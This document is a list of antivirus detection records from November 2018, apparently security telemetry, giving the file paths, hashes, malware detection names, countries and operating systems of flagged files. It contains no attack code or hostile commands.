  Row(detection=Row(filename='c67723641e9ead7dc42aca53cc3f37868cb31438562d2bc2c680fd1651038230', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-32.categorizing\\C67723641E9EAD7DC42ACA53CC3F37868CB31438562D2BC2C680FD1651038230', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='c67723641e9ead7dc42aca53cc3f37868cb31438562d2bc2c680fd1651038230', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T10:47:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0000120d', filepath='C:\\Windows\\Temp\\tmp00000258\\tmp0000120d', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-04T15:49:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181102-130100-5f590731', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3989d88a\\AVSCAN-20181102-125918-52FB0DC2\\AVSCAN-20181102-130100-5F590731', filesize=376000, name='PUA/MyWebSearch.ME.1.#M300.#R6777'), hash='a36c690c41d2651fe6a2e5f9d785ac213521e3b62107bb5a7b6b4ee4372a5b75', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:00:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='zbeub finder.exe', filepath='c:\\users\\X\\desktop\\zbeub finder.exe', filesize=2048000, name='HEUR/APC.#M1.#R1'), hash='b500de581700356962520b312158252db75db6d474ca8fd27f413334d366ed1a', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T20:25:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ainslie 2.exe', filepath='/Users/ottohalter/Library/Containers/com.apple.mail/Data/Library/Mail Downloads/A36B9ABB-4978-4CF2-ADF0-A8F5FDC2E58A/ainslie 2.exe', filesize=576000, name='TR/Nivdort.Gen2.#M2.#R101522'), hash='951a29e32dbaf19adec39b5f6aaf100d69651698fab4a1e21118fec2adf3393e', metadata=Row(cmdline=None, country='CH', os_name='MacOS', os_vmajor='18', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T21:49:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tai xiu vuabai.vn.exe', filepath='\\\\?\\C:\\Program Files\\windows\\Tai Xiu VuaBai.vn.exe', filesize=1280000, name='HEUR/AGEN.1000409.#M1.#R1'), hash='e9d1b0f122d4985bebf5caa0eb2f06ea0ae284e7f40e45336844e378ac9fe55a', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:54:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='blankandsecure.exe', filepath='E:\\HBCD\\Programs\\BlankAndSecure.exe', filesize=64000, name='BDS/Rogue.766033.#M1.#R1'), hash='b2b0f58fa1af9c59f6d9f33219f003bfd2fd1044818f2d998d754fa3f7043a74', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T07:10:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='\\\\?\\C:\\Windows\\Temp\\nsa633F.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T03:03:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ozpipi[1].gif', filepath='\\?\\C:\\Documents and Settings\\X\\Local Settings\\Temporary Internet Files\\Content.IE5\\K3Q9A7UV\\ozpipi[1].gif', filesize=164000, name='WORM/Kido.ih.13.#M1.#R1'), hash='90d555ee3df33bc5ee2139af99567c0c694f11ffc007ef87250e4beabb6c6f1b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-203640-05ec7efe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ca1bc598\\AVSCAN-20181102-203617-03096FCC\\AVSCAN-20181102-203640-05EC7EFE', filesize=1024000, name='HEUR/AGEN.1019326.#M1.#R1'), hash='8dd97ad2b0e142abe4d90cefe2d87cb6bba2d0f030d9f1f22378dd9bdd0a0b0a', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:38:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='abgyfegn.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\abGyfEGn.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:10:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-043508-ba5db017', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-043508-BA5DB017', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='89b60fb73d586146af97f822463ec751e00eb4d4641f37d6a454afd39a2e80bd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:37:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-141343-2ff36ded', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_411d480d\\AVSCAN-20181102-140425-E8AF0EDA\\AVSCAN-20181102-141343-2FF36DED', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='MD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:13:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='nbeach.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\DATA\\MAPS\\NBEACH\\NBEACH.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='71b3716790f24005c718fe95ca3d648c80c4a4af6d9ddc9a4a0ced9ef91a9f7c', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:25:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-165549-12b4641f', filepath='C:\\Documents and Settings\\X\\Application Data\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-152822-6015FB30\\AVSCAN-20181102-165549-12B4641F', filesize=188000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='ba936ee3a3c7ccbdcfeefa196bd8a659827e41ccc7e48c2d964a2df363a91733', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:55:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-175614-e86adfc8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6cc3e2a4\\AVSCAN-20181102-174957-BA826308\\AVSCAN-20181102-175614-E86ADFC8', filesize=5260000, name='PUA/EDownloader.Gen7.#M1.#R1'), hash='d07d13f6ada258f7cd7cc415aa56e2f7e73f1d2688a1274a217b241f004fd37e', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T20:53:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msetres.dll', filepath='D:\\ip2770\\win\\RES\\MESSAGE\\Arabic\\MSetRes.Dll', filesize=152000, name='W32/Ramnit.C.#M1.#R1'), hash='7f3771d972e0cf876bf4b95757d8731ddfcea92a6fd5a5661a4ab19d821a9550', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe', parentsize=673048, timestamp='2018-11-02T01:43:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-160549-191146e2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cdd29d2d\\AVSCAN-20181102-160537-16C64AD4\\AVSCAN-20181102-160549-191146E2', filesize=1856000, name='TR/Rogue.KDV.795271.1.#M1.#R1'), hash='ec418843efb4baeac8d80b9df6901e4860efda54941b64e346f97f9fde3a8994', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:05:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-152722-4a792b13', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_35d0e94c\\AVSCAN-20181102-152606-44558405\\AVSCAN-20181102-152722-4A792B13', filesize=1844000, name='PUA/InstallCore.#M1.#R1'), hash='fb64a814615ae5ffb85b266b55216ce23011393508e40839329d7e63de11eb19', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T17:27:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-181405-71e711ca', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6e897b15\\AVSCAN-20181102-181132-673916F3\\AVSCAN-20181102-181405-71E711CA', filesize=320000, name='HEUR/AGEN.1004090.#M1.#R1'), hash='a9b9b83dae89b09e76c096c14e92449a08ab737fa20012f681990a159f6aa306', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T13:14:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='danh sách tập huấn xlhc.exe', filepath='H:\\\xa0\\USB__Data\\danh sách tập huấn xlhc.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='be2973225aeea112324261ea47eefecffcf932402940f8c860213cb0c52e6569', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T01:25:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='obs60.dll', filepath='\\\\?\\C:\\orant\\BIN\\OBS60.DLL', filesize=128000, name='W32/Ramnit.CD.#M1.#R1'), hash='ec4a0ca3b33b31d87283e27ca2af0fb0072715267396b5afa2d7163bde91df24', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:10:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-090953-863b17d3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d7d09c20\\AVSCAN-20181102-090858-7ED61786\\AVSCAN-20181102-090953-863B17D3', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='HU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T08:09:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181031-002511-4e0f154b', filepath='C:\\Documents and Settings\\X\\Application Data\\Avira\\Antivirus\\TEMP\\AVSCAN-20181031-002341-F68CAF70\\AVSCAN-20181031-002511-4E0F154B', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='eb812853fb6d15b4d726921d8413f53610beae48458f76537009f4cc2b8674af', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:41:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a71d1fd2e5f9eb4d53074cd59755789d27128d75', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\a71d1fd2e5f9eb4d53074cd59755789d27128d75', filesize=2112000, name='Adware/DealPly.b40102.#M1.#R1'), hash='b4010245af8266f90ed17732663c9428050f0c1b74755b659ec842bf8f6c7497', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T17:00:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-083839-711b6ea3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-083839-711B6EA3', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='ecb2ff9ccfcb5b12794736ce29a327ec267608beb43fa7fe13780764a4ba3912', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:40:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='c1ac1bb865024474e2d18e95a9b7dc08bd35751d872cf3042864901d04ab864b', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:12:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='diagnosticshub.standardcollector.service.exe', filepath='C:\\Windows\\System32\\DiagSvcs\\DiagnosticsHub.StandardCollector.Service.exe', filesize=64000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='f30f45f64f9915a54a72936aa73d011b180246953a9e06118d22da07808df075', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T17:17:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='repbrows.exe', filepath='H:\\vbasic6\\Visual Basic 6.0 Enterprise Edition\\OS\\MSAPPS\\REPOSTRY\\REPBROWS.EXE', filesize=512000, name='W32/Infector.Gen.#M300.#R7863'), hash='ab8ed8369a4079032979ccc323658113175195fb7fb1e8bf5d7bf6647fbc9041', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\malpwt2007\\Malaysia PWT 2018I.exe', parentsize=None, timestamp='2018-11-02T07:03:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-231840-f8ad05ff', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e0dee616\\AVSCAN-20181102-231629-E7E58321\\AVSCAN-20181102-231840-F8AD05FF', filesize=5260000, name='PUA/EDownloader.Gen7.#M1.#R1'), hash='c2621af26e54406adb55593c8ee2b80af6fef0eef053dd1c891def234c78d82c', metadata=Row(cmdline=None, country='SI', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T22:18:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='d2ebaf3be8382b33f7f04c73a618798a82ed49bf850cf0195b5e1c55893cdc53', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-19\\D2EBAF3BE8382B33F7F04C73A618798A82ED49BF850CF0195B5E1C55893CDC53', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='d2ebaf3be8382b33f7f04c73a618798a82ed49bf850cf0195b5e1c55893cdc53', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:10:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='new po urgently.exe', filepath='c:\\users\\X\\downloads\\02112018_13\\new po urgently.exe', filesize=584000, name='TR/Dropper.VB.b60a2d.#M1.#R1'), hash='b60a2df189b459696768ff978799e748c5b043d1a97652589239b42c76cc2af6', metadata=Row(cmdline=None, country='EE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T19:38:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\dxw2lc32tu4\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='\\\\\\/4', country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\Taskmgr.exe', parentsize=1083136, timestamp='2018-11-02T03:12:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='faq-content.html', filepath='C:\\Program Files\\CSR\\CSR Harmony Wireless Software Stack\\HelpFiles\\de-de\\faq-content.html', filesize=224000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='b897283448f7168fb1e2cbeaf6d332fae286ae585158fbfc6f52ce78b2895ed2', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=119864, timestamp='2018-11-04T02:52:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hrl108.tmp', filepath='\\\\?\\D:\\Documents and Settings\\X\\Local Settings\\Temp\\hrl108.tmp', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='c0fc4bfba45ba7de276c1a3e2ba91619b50e4a54a8c4b21c3447e7ec0da95007', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:04:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-140741-2df1f9bd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-131819-F64932D1\\AVSCAN-20181104-140741-2DF1F9BD', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:07:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fax_msg453-699-9474.doc', filepath='C:\\TMP\\01\\_virs\\fax_msg453-699-9474.doc', filesize=64000, name='W97M/Agent.960461927.#M1.#R1'), hash='c9647a160a66b9d95f7b91c414b64549df218b2eadd252c4b1ed2d52cc6b4b7c', metadata=Row(cmdline=None, country='SK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:47:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hrl10f.tmp', filepath='\\\\?\\D:\\Documents and Settings\\X\\Local Settings\\Temp\\hrl10F.tmp', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='c0fc4bfba45ba7de276c1a3e2ba91619b50e4a54a8c4b21c3447e7ec0da95007', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:04:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='phieu lien lac.exe', filepath='G:\\\xa0\\phieu lien lac.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='eebe47d403a6c587bc4d9a37342fa4a91545fcec230d486d3bfb8780b0ee168f', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=119864, timestamp='2018-11-04T10:19:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp002391e6', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp002391e6', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:36:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-202046-b15664d0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-202046-B15664D0', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:20:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\program files (x86)\\installshield installation information\\{43aae145-83cf-4c96-9a5e-756cefce879f}\\setup.exe', filesize=2048000, name='W32/Sality.AT.#M1.#R1'), hash='fa05c5cac19a07a49a88ff649b7eefa1b7a0a84e6515cd026ac61a5761b9ac59', metadata=Row(cmdline='--engine=2 --session-id=vH8YLicSbGcqJK5kdELmOKXsXBpyy\\\\\\/\\\\\\/2ogkUBhp4 --registry-suffix=ESET --enable-crash-reporting --srt-field-trial-group-name=NewCleanerUIExperiment', country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\34.176.200\\software_reporter_tool.exe', parentsize=13581432, timestamp='2018-11-04T17:18:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-202127-b6e1dbaa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-202127-B6E1DBAA', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:21:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-165626-077b8ae8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d7c3c43c\\AVSCAN-20181104-165601-026E64FE\\AVSCAN-20181104-165626-077B8AE8', filesize=8852000, name='PUA/FusionCore.P.#M1.#R1'), hash='d93fd89aa6de8363b364f522c38b171dc2a1d1525b7dd0d2c35fab0428c38255', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T15:56:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='back graund.exe', filepath='H:\\\xa0\\Back graund\\Back graund.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:49:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-144520-a76470ce', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1ea170fd\\AVSCAN-20181104-143951-88BFCAE6\\AVSCAN-20181104-144520-A76470CE', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:45:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='new_folder_.exe', filepath='N:\\\xa0\\New_Folder_.exe', filesize=128000, name='TR/Crypt.Xpack.8894.#M1.#R1'), hash='f25c1daf238a29d6211ff51ea00bb12d968e281d6e06ff4599ce9e62a5574578', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:55:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='\xa0.exe', filepath='H:\\\xa0\\\xa0.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:52:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='f3cfd7f6516e2c231ad181d973b0d0f910ef8455fea9b8634faabe7a6b7859a5', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-17.available\\Avira\\F3CFD7F6516E2C231AD181D973B0D0F910EF8455FEA9B8634FAABE7A6B7859A5', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='f3cfd7f6516e2c231ad181d973b0d0f910ef8455fea9b8634faabe7a6b7859a5', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T09:24:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Program Files\\SAP\\SAP Business One Server\\B1_SHR\\Client.x64\\SAP B1ClientAgent Installation\\setup.exe', filesize=1280000, name='W32/Infector.Gen.#M300.#R7863'), hash='ff72ff3984374c01058a97ea1d34dc8c32e4f54a4100f635b924adb7a4a38aa0', metadata=Row(cmdline='invagent.dll,RunUpdate -noappraiser', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T05:23:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='360fsflt.sys', filepath='C:\\Users\\X\\Desktop\\360\\360Safe\\deepscan\\360FsFlt.sys', filesize=444000, name='TR/Rootkit.Gen.#M300.#R3885'), hash='f47a1363c4838fe1adf19353ffe24ea8a53a377ed976e562d1683e4371cd43eb', metadata=Row(cmdline=None, country='SG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:53:24Z'), dt=datetime.date(2018, 11, 1))],
